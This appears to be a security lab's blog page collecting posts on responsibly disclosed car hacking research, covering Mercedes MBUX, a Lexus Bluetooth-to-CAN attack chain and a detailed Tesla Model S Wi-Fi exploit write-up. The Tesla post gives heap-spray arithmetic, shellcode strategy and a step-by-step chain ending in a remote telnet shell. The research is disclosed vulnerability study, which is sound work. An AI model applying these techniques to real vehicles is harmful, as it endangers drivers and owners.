Keen Security Lab Blog

Tencent Security Keen Lab: Experimental Security Assessment of Mercedes-Benz Cars

2021-05-12T06:00:00.000Z

MBUX, Mercedes-Benz User Experience is the infotainment system in Mercedes-Benz cockpits. Mercedes-Benz first introduced MBUX in the new A-Class back in 2018, and is adopting MBUX in their entire vehicle line-up, including Mercedes-Benz E-Class, GLE, GLS, EQC, etc.

In this research, we have conducted an in-depth and comprehensive analysis of both hardware and software of MBUX. We gathered technical materials and set up a test environment, analyzed the attack surfaces and performed security tests.

Modern infotainment system is much more powerful, complex and secure than before, so is MBUX from Mercedes-Benz. We haven’t seen any public material that gives a comprehensive security analysis of a modern infotainment system. So a broader security assessment is needed in this research, instead of a single security penetration event. We have explored the attack surfaces exhaustively including components such as the radio.

In our research, we found various security issues on MBUX and successfully exploited some attack surfaces on the head unit and T-Box. We have gained first physical access and subsequently remote access to the main infotainment ECU: the head unit. This enabled us to perform certain vehicle functions remotely (i.e. change internal lighting colors, display images on infotainment screen). We demonstrated how to compromise an internal chip on T-Box, which was proved by sending arbitrary CAN messages from a debug version T-Box.

Following the global industry practice on “responsible disclosure” of product security vulnerabilities, we have reported the technical details of all the vulnerabilities discovered in this research to Daimler. The discovered vulnerabilities have been immediately confirmed by their security team.

Keen Lab appreciates the prompt response and proactive attitude of Daimler, on responding our vulnerability report and for taking direct action to fix the issues efficiently. Both companies collaborate closely and highly efficient.

Issued CVEs:

Disclosure Timeline

March 2020: Keen Lab kicked off the Mercedes-Benz research project internally.
November 2020: Keen Lab proved all the vulnerability findings and attack chains in an experimental environment.
21st December 2020: First Email from Keen Lab to Daimler
24th December 2020: Keen Lab reported all the research findings to Daimler security team in a secure way.
7th January 2021: First clarification Call between Keen Lab and Daimler
15th January 2021: Daimler security team confirmed all the vulnerabilities reported by Keen Lab. Some fixes for these vulnerabilities were already available and in rollout.
21th January 2021: CVEs requested by Daimler security team.
30th January 2021: Daimler security team confirmed and started the rollout for the new fixes.
February/March 2021: Preparation of the joint report publication.
May 2021: This summary report has been released to public.

Response from Daimler

Please refer the following link for the press release from Daimler:
https://media.daimler.com/marsMediaSite/ko/en/49946866

Daimler security team highly appreciate Keen Lab’s profound know-how, expertise and its excellent work in the Mercedes-Benz research project, Daniel Eitler (CISO of Daimler) and Adi Ofek (the CarIT Security Mandate in Mercedes-Benz Cars) award Keen Lab the signed thank you letter.

Technical Research Report

Please refer the following link to know more about our research:
Mercedes-Benz MBUX Security Research Report.pdf

Tencent Keen Security Lab: Experimental Security Assessment on Lexus Cars

2020-03-30T01:55:00.000Z

Since 2017, Lexus has equipped several models (including Lexus NX, LS and ES series) with a new generation infotainment, which is also known as AVN (Audio, Visual and Navigation) unit. Compared to some Intelligent connected infotainment units, like Tesla IVI and BMW ConnectedDrive system, the new Lexus AVN unit seems to be a bit more traditional. From a security perspective, it may highly reduce the possibility of being attacked by potential cybersecurity issues. But a new system is always introducing new security risks. After conducting an ethical hacking research on a 2017 Lexus NX300, Keen Security Lab [1] has discovered several security findings in Bluetooth and vehicular diagnosis functions on the car, which would compromise AVN unit, internal CAN network and related ECUs. By chaining the findings, Keen Security Lab are able to wirelessly take control of AVN unit without any user interaction, then inject malicious CAN messages from AVN unit into CAN network to cause a vulnerable car to perform some unexpected, physical actions.
Currently, Toyota is in progress working on the mitigation plans. Therefore, we decided to just make a brief disclosure in this paper, instead of a full disclosure which would be considered as irresponsible to vehicle users. If all goes well, the full technical report will be released at a proper time in the year 2021.

In-Vehicle Units Overview

Based on hardware analysis and CAN network testing on a 2017 Lexus NX300, we have a basic understanding of the in-vehicle architecture (AVN, DCM, ECUs and CAN network), which is shown in the following figure.

DCM

It’s a telematic box (a.k.a. T-Box) running on a Qualcomm MDM6600 baseband chip. Using the Ethernet over USB interface, it offers 3G network for AVN unit to support telematics service. It can query status of ECUs (like Engine and Doors) through CAN bus and upload the result to the backend.

AVN

As an in-vehicle infotainment unit, it provides users radio, multimedia and navigation functions. Actually, the Lexus AVN is comprised of two components: DCU (Display Control Unit) and MEU (Multimedia Extension Unit for maps). DCU is the key component of AVN Unit. The main board of DCU exposes some general attack surfaces, like Wi-Fi, Bluetooth and USB interfaces. Thanks to the uCOM board, DCU can talk with the internal ECUs via CAN messages indirectly. MEU is pretty transparent to users, which is only responsible for providing navigation data. Between DCU and MEU, there’s a USB Ethernet cable for messaging communication.

DCU Main Board

After tearing down DCU, we found it includes two circuit boards. According to the position, as shown in the following figure, the top-layer is referred to be DCU Main Board, and the bottom-layer is DCU uCOM Board.

The DCU Main Board is integrated with some regular chips, including a Renesas R8A779x SoC [2], Broadcom BCM4339 chip for Wi-Fi & Bluetooth, 2 x 512MB SDRAM, an 8GB eMMC NAND Flash and an 8MB SPI NOR Flash on the board. The SoC has dual ARM-CortexA15 cores that are used to run various codes including the initial code (bootrom), U-Boot in NOR Flash, as well as the Linux system in eMMC Flash.
There’s a standalone SPI NOR Flash on the back side of DCU Main Board. According to the chip’s datasheet, the SPI Flash has 64M-bits of total storage. It’s trivial to solder all the pins and connect them to a universal Flash programmer. After choosing the correct flash chip ID in the “flashrom” [3], the whole Flash data can be dumped. After reverse engineering the dumped data, we deduced the Flash’s memory layout basically (as shown in Figure 3). In order to support A/B system updates, the Flash keeps a copy of some firmware images and config data, like U-Boot Config, U-Boot Image and BSP Boot Config.

DCU Main Board also integrates an 8GB eMMC NAND Flash to store the main codes and data of the AVN unit, including Linux kernel image, device tree blob, ramdisk image and Ext4 filesystems with multiple partitions. Meanwhile, there’s a snapshot image of Linux system that is used to enable quick boot for the AVN unit. And in order to support A/B (Seamless) system updates, the eMMC Flash also keeps a copy of the Linux kernel image and ramdisk image. The memory layout of the eMMC Flash is as follows.

DCU uCOM Board

The purpose of DCU uCOM Board is to manage the power and external units, like DVD player, air conditioner, touch pad and electric clock. In order to communicate with these external units, the uCOM Board equips with two CAN&LIN controller MCUs (SYSuCOM and CANuCOM) and each controller MCU is connected to a standalone CAN transceiver on the board.
CANuCOM MCU is a CAN and LIN controller of the DCU. It has a Renesas R5F10PLJL chip (shown in Figure 5). By connecting to a CAN transceiver, CANuCOM can access the Infotainment CAN directly and exchange CAN messages with the in-vehicle ECUs, like Gateway ECU and Main Body ECU.

SYSuCOM MCU is a CAN controller based on the Panasonic MNZLF79WXWUB chip. With a CAN transceiver, it exchanges CAN messages with the touch pad and electric clock which are in a dedicated CAN domain. It connects CANuCOM and DCU Main Board with UART ports directly. SYSuCOM exchanges different messages between DCU Main Board and the external units.

ECUs and CAN Network

Central gateway is an important ECU, which separates the in-vehicle CAN network into different CAN domains, like Infotainment CAN, Body Electrical CAN, OBD Diagnostic CAN, Chassis CAN and Powertrain CAN. Another essential ECU is Main Body ECU, which is also known as Body Control Module (BCM). The Main Body ECU manages a set of ECUs which are used to handle vehicle body related functions. DCM and AVN belong to Infotainment domain. For purpose of CAN-bus messaging, DCU has 2 different CAN buses (which are referred to be CAN-1 and CAN-2) on uCOM Board by design. With the uCOM board, DCU Main Board can retrieve vehicle status by sending specific CAN messages to Gateway ECU.
CAN-1. The CAN bus of CANuCOM MCU, which is connected directly to the Infotainment CAN. By communicating with SYSuCOM through UART, CANuCOM can transfer indirect CAN messages that are sent from the DCU Main Board.
CAN-2. The CAN bus of SYSuCOM MCU, which is a dedicated CAN bus for communication among DCU, touch pad and electric clock. This CAN bus is physically separated from in-vehicle CAN network.
In order to send CAN messages, DCU Main Board establishes two standard UART ports (/dev/ttySC1 and /dev/ttySC9) with SYSuCOM. The DCU system can send custom CAN messages into /dev/ttySC1 and the messages will be transferred to CAN-1 bus. In a similar way, CAN messages sent into /dev/ttySC9 will be transmitted to CAN-2 bus.

Security findings

All the following security findings have been proven to be effective on a 2017 Lexus NX300, and also have been confirmed by Toyota after we submitted the full report and collaborated with them on technical details.

Compromising DCU System Wirelessly

We utilized two vulnerabilities to exploit the in-vehicle Bluetooth service and got remote code execution in DCU system (Linux OS) with root privileges. The first vulnerability is caused by an out-of-bound heap memory read and the second is a heap buffer overflow vulnerability. Both vulnerabilities lie in the process of creating Bluetooth connection before pairing, which makes Bluetooth exploitation absolutely touch-less and interaction-less at close proximity. In order to obtain Bluetooth MAC address of an affected car, a well-known device “Ubertooth One” [4] is useful to sniffer MAC address over the air if DCU system has been paired with mobile phones before.
Furthermore, DCU system does not support secure boot, which means the whole system can be manipulated, such as replacing a custom boot animation as usual. After fully taking control of DCU system, we found it’s not easy to send arbitrary CAN messages, because of CAN message filtering mechanism has been implemented in DCU uCOM board. Luckily, DCU Linux system is still responsible for reprograming uCOM firmware.

Reprograming uCOM Firmware

By reverse engineering the uCOM firmware and its update logic, we were able to re-flash the uCOM board with malicious firmware images to bypass CAN message validations, and gain the ability of sending arbitrary CAN messages to Infotainment CAN.

Transmitting Unauthorized Diagnosis Messages

Based on experimental testing results of on-board diagnostics, we confirmed a compromised DCU system is permitted to control diagnostic functions via unauthorized diagnostic CAN messages. For example, the Main Body ECU can be maliciously diagnosed to make a car perform physical actions without authentication.

Wireless Attack Chain

By chaining the findings (listed in Table 1) existed in Bluetooth and on-board diagnostic functions, a remote, touch-less attack chain from Bluetooth wireless connectivity down into automotive CAN network is feasible to be implemented as follows.

Phase-1. As the in-car Bluetooth service is running with root user privileges in DCU system. Once DCU system is compromised by Bluetooth vulnerabilities, the malicious codes are going to be deployed wirelessly and permanently resident in the system.
Phase-2. The malicious codes can be designed to make the compromised DCU system automatically connect to a Wi-Fi hotspot we created and remotely spawn an interactive root shell of DCU system.
Phase-3. Then we could maliciously transmit arbitrary CAN messages through SYSuCOM and CANuCOM to CAN bus (from the root shell through Wi-Fi network).
Phase-4. Furthermore, by leveraging the diagnostic CAN messages, some automotive ECUs inside CAN network would be tricked into executing diagnostic functions and triggering the car with unexpected physical motions.

Disclosure Process

The security research of Lexus cars is an ethical hacking research project. Keen Lab follows the “Responsible Disclosure” practice, which is a well-recognized practice by global manufactures in software and internet industries, to work with Toyota on fixing the security findings and attack chains listed in this report.

Below is the detailed disclosure timeline:

Press Release from Toyota

Please refer the following link.
https://global.toyota/en/newsroom/corporate/32120629.html

Reference

[1] https://keenlab.tencent.com/en/
[2] https://www.renesas.com/us/en/solutions/automotive/soc/r-car-m2.html
[3] https://www.flashrom.org/Flashrom
[4] https://greatscottgadgets.com/ubertoothone/
[5] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5551

Tencent Keen Security Lab joins GENIVI Alliance

2020-03-18T08:00:00.000Z

Tencent Keen Security Lab (Keen Lab) has joined the GENIVI Alliance, a non-profit alliance focused on delivering open source, in-vehicle infotainment (IVI) and connected vehicle software.

About GENIVI

The GENIVI Alliance[1] develops standard approaches for integrating operating systems and middleware present in the centralized and connected vehicle cockpit. The alliance links adopters of Android™ Automotive, AUTOSAR, Linux, and other in-vehicle software with solution suppliers resulting in a productive and collaborative community of 100+ members worldwide.

About Keen Lab

Keen Lab is a professional security research team, focusing on cybersecurity for PCs and mobile devices more than ten years, under Tencent Company. In recent years, Keen Lab expanded capabilities in new research areas including connected/intelligent cars, IoT products, cloud computing and virtualization, as well as AI. A major research focus of Tencent Keen Security Lab is automotive security. . Since 2015, Keen Lab started research projects in connected vehicle[2,3,4] categories and building partnership with manufacturers in IoT and car industries. Keen Lab has accumulated a wealth of experience and technology in vehicle security penetration testing, security solutions, best practices for connected car.

Cooperation

As a new member of the GENIVI, Keen Lab will contribute its comprehensive expertise and in depth understanding of vehicle technologies to improving the development processes and security guidelines, providing a shared benefit for GENIVI members, and enhance automotive security with its knowledge and solutions.

[1] https://www.genivi.org/about-genivi/
[2] https://keenlab.tencent.com/en/2016/09/19/Keen-Security-Lab-of-Tencent-Car-Hacking-Research-Remote-Attack-to-Tesla-Cars/
[3] https://keenlab.tencent.com/en/2017/07/27/New-Car-Hacking-Research-2017-Remote-Attack-Tesla-Motors-Again/
[4] https://keenlab.tencent.com/zh/2018/05/22/New-CarHacking-Research-by-KeenLab-Experimental-Security-Assessment-of-BMW-Cars/

Exploiting Wi-Fi Stack on Tesla Model S

2020-01-02T04:00:00.000Z

In the past two years, Keen Security Lab did in-depth research on the security of Tesla Cars and presented our research results on Black Hat 2017 and Black Hat 2018. Our research involves many in-vehicle components. We demonstrated how to hack into these components, including CID, IC, GATEWAY, and APE. The vulnerabilities we utilized exists in the kernel, browser, MCU firmware, UDS protocol, and OTA updating services. It is worth noting that recently we did some interesting works on Autopilot module, we analyzed the implementation details of autowipers and lane recognition function and make an example of attacking in the physical world.

To understand the security of Tesla's on-board system more comprehensively, we researched the Wi-Fi module (aka Parrot on Model S) and found two vulnerabilities in the Wi-Fi firmware and Wi-Fi driver. By combining these two vulnerabilities, the host Linux system can be compromised.

Introduction

This article reveals the details of two vulnerabilities and introduces how to exploit these vulnerabilities, which proves that these vulnerabilities can be used by an attacker to hack into the Tesla Model S in-vehicle system remotely through the Wi-Fi.

Parrot Module

The third-party module Parrot on Tesla Model S is FC6050W, which integrates the Wireless function and Bluetooth function. Parrot connects to CID via USB protocol and runs Linux. Parrot uses the USB Ethernet gadget so that Parrot can communicate with CID trough Ethernet. When Tesla Model S connected to a wireless network, it is Parrot connected to the wireless network. Then, the network traffic from CID routed by Parrot.

We can find the hardware organization from a very detailed datasheet[1].

The pinout description of Parrot also presented in the datasheet. The Linux shell can be found through the Debug UART pins.

The reset pin connects to the GPIO port of CID. Thus CID can reset the whole Parrot module by using these commands.

1
2
3

echo 1 \> /sys/class/gpio/gpio171/value
sleep 1
echo 0 \> /sys/class/gpio/gpio171/value

Marvell Wifi Chip

The Marvell 88W8688 is a low-cost, low-power highly-integrated IEEE 802.11a/g/b MAC/Baseband/RF WLAN and Bluetooth Baseband/RF system-on-chip (SoC) [2].

The block diagram published on the Marvell website[3].

The 88w8688 contains an embedded high-performance Marvell Ferocean ARM9-compatible processor. By modifying the firmware, we acquired the value of the Main ID Register, which is 0x11101556. According to the value, we concluded the CPU might be Feroceon 88FR101 rev 1. On Parrot, the Marvell 88w8688 chipset connects to the host system via the SDIO interface.

The memory region of 88w8688 could be as follows.

Firmware

The firmware download process of 88w8688 contains two stages, the helper firmware “sd8688_helper.bin” downloads to chip first, then the main firmware “sd8688.bin” downloads to chip. The helper responsible for and downloading the firmware file and verifying every chunk of the firmware file. The firmware file consists of many chunks, below is the structure of each chunk stable.

struct fw_chunk {   
  int chunk_type;
  int addr;
  unsigned int length;
  unsigned int crc32;
  unsigned char [1];
} __packed;

The 88w8688 chip runs based on ThreadX OS which is an RTOS targeting for embedded devices. The code of ThreadX can be found in the ROM region, so the firmware “sd8688.bin” runs as an application of ThreadX.

On Tesla, the version ID of firmware “sd8688.bin” is “sd8688-B1, RF868X, FP44, 13.44.1.p49”. All the following research results are based on this version.

After identified the ThreadX API, the information about tasks is as below.

Also, the information about memory pools is as below.

Log and Debug

The firmware did not implement the CPU vector handler for Data Abort, Prefetch Abort, Undefine, and SWI, which means the firmware halts after a crash, and we cannot know where and why the firmware crash.

So, we patched the firmware with our custom Prefetch Abort and Data Abort vector handler. The handler records the values of register includes general-purpose register, the status register, and link register in system mode and IRQ mode. In this way, we can know where the code runs in both system mode and IRQ mode when a crash happens.

We chose to write these values to unused memory, for example, 0x52100~0x5FFFF. These values still can be read after the chip reset.

After implemented the undefine vector handler and changed some instruction to undefine instruction, we can get or set registers when the firmware is running. In this way, we can debug the firmware.

To re-download a new firmware to chip, try to send the command HostCmd_CMD_SOFT_RESET from kernel to chip, then the chip resets and new firmware downloads.

Vulnerability in Firmware

The 88w8688 chip supports 802.11e WMM (Wi-Fi Multimedia) protocol. In this protocol, the station could send an action frame Add Traffic Stream (ADDTS) request with Traffic Specification (TSPEC) to another device. Then the other device returns an action frame ADDTS response. Below is the action frame.

The whole process of ADDTS may like this. When the host operation system wants to send an ADDTS request, the kernel driver fills and sends a HostCmd_DS_COMMAND structure with command HostCmd_CMD_WMM_ADDTS_REQ to chip. Then the firmware transmits the ADDTS request packet over the air. When the chip received an ADDTS response from another device, it copies this response without an action header to the HostCmd_CMD_WMM_ADDTS_REQ structure as a result of ADDTS_REQ command and passes the structure HostCmd_DS_COMMAND to the kernel driver. After that, the kernel driver process this response.

struct _HostCmd_DS_COMMAND
{
    u16 Command;
    u16 Size;
    u16 SeqNum;
    u16 Result;
    union
    {
        HostCmd_DS_GET_HW_SPEC hwspec;
        HostCmd_CMD_WMM_ADDTS_REQ;
        //…….
     }
}

The vulnerability exists in the process of copying the data from the ADDTS response packet to the HostCmd_CMD_WMM_ADDTS_REQ structure. The length of copy calculated by subtracting 4 bytes length of action header from length of action frame. But if the action frame only contains a header and the length of the header is only 3 bytes, the length needs to copy is 0xffffffff. So, the memory could be corrupted very badly, resulting in a crash very stable.

Vulnerability in Driver

There are three kinds of data sent between the chip and the kernel driver through the SDIO interface, MV_TYPE_DATA, MV_TYPE_CMD, and MV_TYPE_EVENT. The definition of commands and events can be found in source code.

The whole process about command processing as follows. The driver handles the command from a user-space process such as ck5050, wpa_supplicant and initializes a structure HostCmd_DS_COMMAND by the function wlan_prepare_cmd(). The last argument pdata_buf points to a related structure that contains the necessary information to initialize the structure HostCmd_DS_COMMAND. The function wlan_process_cmdresp() is responsible for handling the command response from the chip and copying back the results to the structure references by pdata_buf.

int
wlan_prepare_cmd(wlan_private * priv,
                 u16 cmd_no,
                 u16 cmd_action,
                 u16 wait_option, WLAN_OID cmd_oid, void *pdata_buf);

The vulnerability exists in the function wlan_process_cmdresp() when the driver is processing the response of command HostCmd_CMD_GET_MEM. The function wlan_process_cmdresp() not check if the member size of structure HostCmd_DS_COMMAND is valid, which results in a buffer overflow when copying the data from structure HostCmd_DS_COMMAND to other place.

Code Execute in Wi-Fi Chip

Obviously, the vulnerability in firmware is a heap overflow. To utilize this vulnerability to gain code execution in the Wi-Fi chip, we need to figure out how the function memcpy() corrupted the memory, what could happen after triggering the vulnerability, and where the crash happens.

To trigger the vulnerability, the length of action header should be less than 4, and we must provide the correct dialog token in action frame, which means the length passed to memcpy() must be 0xffffffff. The source address is fixed because the source buffer allocates from memory pool pool_start_id_rmlmebuf, which has only one block. The destination buffer allocates from memory pool pool_start_id_tx. So the destination address could be one of the four addresses.

The source address and destination address locate in RAM region 0xC0000000~0xC003FFFF, but the address range from 0xC0000000 to 0xCFFFFFFF is valid. So, the results of reading or writing to these memory areas are the same.

Because the memory region from 0xC0000000 to 0xCFFFFFFF is readable and writable, the process of copying is almost impossible to reach the boundary of the memory region. After 0x40000 bytes copied, the memory can be considered as shifted a distance once. In this process, some data could be overwritten and lost.

The CPU in 88w8688 contains only one core, so the chip may not crash during the execution of copying until an interrupt occurs. Since memory already corrupted by the vulnerability, in most cases, the chip crashed in the interrupt handlers.

The interrupt controller provides a simple firmware interface to the interrupt system. When an interrupt occurs, the firmware gets the interrupt event from the register of the interrupt controller and invokes the related interrupt handler.

There are many interrupt sources, so the chip can crash at many places after triggering the vulnerability.

One possibility is that the interrupt comes from 0x15, then the function 0x26580 be called. There is a link list pointer at 0xC000CC08. The value of this pointer could be overwritten after triggering the vulnerability. However, the manipulation of the link list may not be able to give us the chance to gain code execution.

Another crash happens in the interrupt handler of the Timer Interrupt. The handler does thread switching sometimes, and another task could resume running, which means the process of copying can be suspended temporarily and the chip crash during other tasks running. In this situation, the firmware crashed in function 0x4D75C usually.

The function read a pointer at 0xC000D7DC, which points to structure TX_SEMAPHORE. After triggering the vulnerability, we can overwrite the pointer to our fake TX_SEMAPHORE structure.

typedef struct TX_SEMAPHORE_STRUCT
{
    ULONG       tx_semaphore_id;
    CHAR_PTR    tx_semaphore_name;
    ULONG       tx_semaphore_count;
    struct TX_THREAD_STRUCT  *tx_semaphore_suspension_list;
    ULONG                    tx_semaphore_suspended_count;
    struct TX_SEMAPHORE_STRUCT *tx_semaphore_created_next;  
    struct TX_SEMAPHORE_STRUCT *tx_semaphore_created_previous;
} TX_SEMAPHORE;

If the member tx_semaphore_suspension_list also points to our fake TX_THREAD_STRUCT structure, when the function _tx_semaphore_put() update the link of the adjacent threads in TX_THREAD_STRUCT structure, we can get a chance to “write anything anywhere.”

We can directly overwrite the next instruction after “BL os_semaphore_put” with a jump instruction to archive code execute as the memory in ITCM is RWX. The difficulty lies in we need to spray both TX_SEMAPHORE structure and TX_THREAD_STRUCT structure in memory. We also need to make sure the pointer tx_semaphore_suspension_list in structure TX_SEMAPHORE points to our fake TX_THREAD_STRUCT structure. These conditions can be satisfied, but the success rate is very low.

We mainly focus on the third crash place, in the handler of MCU interrupts. The pointer g_interface_sdio points to structure struct_interface can be overwritten.

struct struct_interface
{
  int field_0;
  struct struct_interface *next;
  char *name_ptr;
  int sdio_idx;
  int fun_enable;
  int funE;
  int funF;
  int funD;
  int funA;
  int funB; // 0x24
  int funG;
  int field_2C;
};

The function pointer funB in this structure will be invoked in this function. If the pointer g_interface_sdio overwrited, arbitrary code execution can be achieved.

Here is the register dump when instruction “BX R3” executes in function interface_call_funB(). In this dump, g_interface_sdio overwrited by 0xabcd1211.

LOG_BP_M0_CPSR      : 0xa000009b
LOG_BP_M0_SP        : 0x5fec8
LOG_BP_M0_LR        : 0x3cd50
LOG_BP_M0_SPSP      : 0xa00000b2
LOG_BP_M1_CPSR      : 0xa0000092
LOG_BP_M1_SP        : 0x5536c
LOG_BP_M1_LR        : 0x4e3d5
LOG_BP_M1_SPSP      : 0xa0000013
LOG_BP_M2_CPSR      : 0
LOG_BP_M2_SP        : 0x58cb8
LOG_BP_M2_LR        : 0x40082e8
LOG_BP_M2_SPSP      : 0
LOG_BP_R1           : 0x1c
LOG_BP_R2           : 0
LOG_BP_R3           : 0xefdeadbe
LOG_BP_R4           : 0x40c0800
LOG_BP_R5           : 0
LOG_BP_R6           : 0x8000a500
LOG_BP_R7           : 0x8000a540
LOG_BP_R8           : 0x140
LOG_BP_R9           : 0x58cb0
LOG_BP_R10          : 0x40082e8
LOG_BP_FP           : 0
LOG_BP_IP           : 0x8c223fa3
LOG_BP_R0           : 0xabcd1211

The function interface_call_funB() called by the handler of MACMCU interrupt at 0x4E3D0.

After the source address of copying reach the address 0xC0040000, the whole memory can be considered as shifted a distance once. After the source address of copying reach the address 0xC0080000, the whole memory shifted twice. The distance could be as follows.

0xC0016478-0xC000DC9B=0x87DD
0xC0016478-0xC000E49B=0x7FDD
0xC0016478-0xC000EC9B=0x77DD
0xC0016478-0xC000F49B=0x6FDD

After trigger the vulnerability, in most cases, the memory will be shifted 3~5 times when interrupt occurs. The pointer g_interface_sdio at address 0xC000B818, so g_interface_sdio can be overwritten by the data at these addresses.

0xC000B818+0x87DD*1=0xC0013FF5
0xC000B818+0x87DD*2=0xC001C7D2
0xC000B818+0x87DD*3=0xC0024FAF
0xC000B818+0x87DD*4=0xC002D78C
…
0xC000B818+0x7FDD*1=0xC00137F5
0xC000B818+0x7FDD*2=0xC001B7D2
0xC000B818+0x7FDD*3=0xC00237AF
0xC000B818+0x7FDD*4=0xC004B700
…
0xC000B818+0x77DD*1=0xC0012FF5
0xC000B818+0x77DD*2=0xC001A7D2
0xC000B818+0x77DD*3=0xC0021FAF
0xC000B818+0x77DD*4=0xC002978C
…
0xC000B818+0x6FDD*1=0xC00127F5
0xC000B818+0x6FDD*2=0xC00197D2
0xC000B818+0x6FDD*3=0xC00207AF
0xC000B818+0x6FDD*4=0xC002778C
…

The addresses 0xC0024FAF, 0xC00237AF and 0xC0021FAF located in a huge DMA buffer 0xC0021F90~0xC0025790 which is used for storing 802.11 Data Frame received by Wi-Fi chip temporarily. So, this huge buffer can be used to spray with fake pointers.

To spray our fake pointers in memory, we can send many normal 802.11 Data Frame full of fake pointers to Wi-Fi chip. The DMA buffer is so huge that we can directly spray our shellcode in it. To improve the success rate of exploiting, we used egg-hunters to search for our shellcode.

If we successfully overwrote g_interface_sdio, the shellcode or egg hunter can very close to 0xC000B818. The fake pointer we used is 0x41954 because there is a pointer 0xC000B991 at address 0x41954+0x24. Then, we can hijack $PC to 0xC000B991. At the same time, the pointer 0x41954 can be recognized as normal instructions.

1 2	54 19 ADDS R4, R2, R5 04 00 MOVS R4, R0

We got about a 25% success rate to achieve code execution in this method.

Attack Host System

The vulnerability in kernel driver can be trigger by sending data from chip through SDIO interface.

The command HostCmd_CMD_GET_MEM initialize by function wlan_get_firmware_mem() in normal case.

In this case, pdata_buf points to the buffer allocated by the function kmalloc(), which means it is a kernel heap overflow. The function wlan_get_firmware_mem() cannot be called in the real environment, and heap overflow is hard to exploit.

However, a compromised chip can return the result with a different command id after receiving a command. Therefore, the vulnerability can be triggered during the process of many command processing. In this situation, the vulnerability can be heap overflow or stack overflow depending on where pdata_buf points to. We found the function wlan_enable_11d(), which used the address of local variable enable as pdata_buf. Thus, we can trigger a stack buffer overflow.

The function wlan_enable_11d() called by wlan_11h_process_join(). Obviously, HostCmd_CMD_802_11_SNMP_MIB used in the process of associating with AP. The vulnerability in firmware only can be trigger when Parrot already connects to an AP. When we get code execution in the chip, Parrot already joined an AP. To trigger the stack buffer overflow in wlan_enable_11d(), the compromised chip needs to deceive the kernel driver that the chip disconnects from AP. Then, a reconnection launched by the driver and the command HostCmd_CMD_802_11_SNMP_MIB sent to firmware in function wlan_enable_11d(). Therefore, to launch the reconnection, the chip only needs to send event EVENT_DISASSOCIATED to the driver.

After triggering the vulnerability and get code execution in chip, the chip cannot work properly anymore, so our shellcode running in chip need to handle a series of commands when Parrot is trying to reconnect to original AP. The only command we need to handle is HostCmd_CMD_802_11_SCAN before the command HostCmd_CMD_802_11_SNMP_MIB comes. Below is the whole process from disassociation to trigger kernel driver vulnerability.

The event and command packet can be sent directly by operating the register SDIO_CardStatus and SDIO_SQReadBaseAddress0. The register SDIO_SQWriteBaseAddress0 at 0x80000114 is useful for processing the data received from the kernel driver.

Command Execute in Linux System

As Linux Kernel 2.6.36 does not support NX, it’s possible to execute the shellcode on stack directly. In the meantime, the type of size in structure HostCmd_DS_COMMAND is u16, so the shellcode can be big enough to do lots of things.

After triggered vulnerability and controlled $PC, $R7 points to the kernel stack. It is very convenient to jump to the shellcode.

The function run_linux_cmd in shellcode called Usermode Helper API to execute Linux commands.

Get Shell Remotely

After triggering the vulnerability in chip, the whole RAM region corrupted, and the firmware cannot work anymore. Besides, the kernel stack is corrupted and needs to be repaired.

To make the wireless function of Parrot works again properly, we did these things:

1. After sending the kernel payload through the SDIO interface, we reset the chip by running the following code. Later, the kernel driver finds the chip and redownload the firmware.

1
2
3

*(unsigned int *)0x8000201c|=2;
*(unsigned int *)0x8000a514=0;
*(unsigned int *)0x80003034=1;

2. Call kernel function rtnl_unlock() in shellcode function fun_ret() to unlock rtnl_mutex which locked before wlan_enable_11d() called, or the wireless function in Linux will hangs, result in Parrot reboot by CID.

3. Call kernel function do_exit() in shellcode function fun_ret() to kill the user-mode process wpa_supplicant and restart it, so we don’t need to repair the kernel stack.

4. Kill process ck5050 and start again, or ck5050 segment fault due to chip reset, result in Parrot reboot by CID.

To get shell remotely, we force Parrot to connect to our AP and alter iptables rules. Then, the shell listened on port 23 can be reached.

Finally, the success rate of getting a shell is about 10%.

Complete Exploit process

The attacker sends DEAUTH frames to all the AP nearby.
When Tesla reconnects to AP, the attacker gets the MAC address of Tesla.
Spray the fake pointer, then trigger the vulnerability in firmware by directly send corrupt Action Frame.
The function memcpy() executed until interrupt occurs.
Gain code execution in the Wi-Fi chip.
Stage 1 shellcode sends the event EVENT_DISASSOCIATED to the driver.
Stage 1 shellcode handles some commands and waits for the command HostCmd_CMD_802_11_SNMP_MIB.
Stage 1 shellcode sends the payload to trigger the kernel stack overflow through the SDIO interface.
Stage 2 shellcode executed and invoke the kernel function call_usermodehelper().
Linux system command executed and try to fix the wireless function of Parrot.
Attacker setups an AP and a DHCP server in this AP
Linux system command forces the Parrot to join our AP and alter the iptables rules.
The attacker can telnet to port 23 on Parrot.

Demo Video

Conclusion

In this article, we presented the details of the vulnerability in the firmware and the vulnerability in the Marvell kernel driver and explained how to utilize these two vulnerabilities to compromise the Parrot Linux system by just sending malicious packets from a normal Wi-Fi dongle.

Responsible disclosure

All the two vulnerabilities we presented above are reported to Tesla in March 2019. Tesla already fixed them in version 2019.36.2, and the Marvell also has deployed a fix and published a security advisory[4] to the issue. The disclosure of the vulnerability research report had been communicated to Tesla, and Tesla is aware of our release.

You can track the issue from links below:

References

[1] https://fccid.io/RKXFC6050W/Users-Manual/user-manual-1707044

[2] https://www.marvell.com/wireless/88w8688/

[3] https://www.marvell.com/wireless/assets/Marvell-88W8688-SoC.pdf

[4] https://www.marvell.com/documents/ioaj5dntk2ubykssa78s/

TenSec 2019

2019-05-24T06:00:00.000Z

Tencent Security Conference (TenSec) is an international cybersecurity summit launched by Tencent Security, hosted by Tencent Keen Security Lab and Tencent Security Platform Department, and co-organized by Tencent Security Academy.

Over the last three years, we have invited the top experts from international security field all over the world, focusing on Big Data, AI, Mobile Internet, Cloud Computing, Block Chain, Virtualization and Connected Vehicle as well as security domain such as Research Instruments.TenSec has been committed to explore the international cutting-edge security technologies and build a long-lasting platform that communication and cooperation for global security field to jointly maintain the emerging Internet business and user security.

**Tencent Security will host TenSec 2019, Tuesday, June 11th - Wednesday, June 12th at The WEST BUND ShangHai XuHui. **

Tencent Keen Security Lab: Experimental Security Research of Tesla Autopilot

2019-03-29T02:50:00.000Z

Introduction

With the rise of Artificial Intelligence, Advanced Driver Assistance System (ADAS) related technologies are under rapid development in the vehicle industry. Meanwhile, the security and safety of ADAS have also received extensive attention.

As a world-leading security research team, Tencent Keen Security Lab has been conducting continuous research in this area. At the Black Hat USA 2018 security conference, Keen Lab presented the first ever demonstration to remotely compromise the Autopilot[1] system on a Tesla Model S (The attack chain has been fixed immediately after we reported to Tesla)[2].

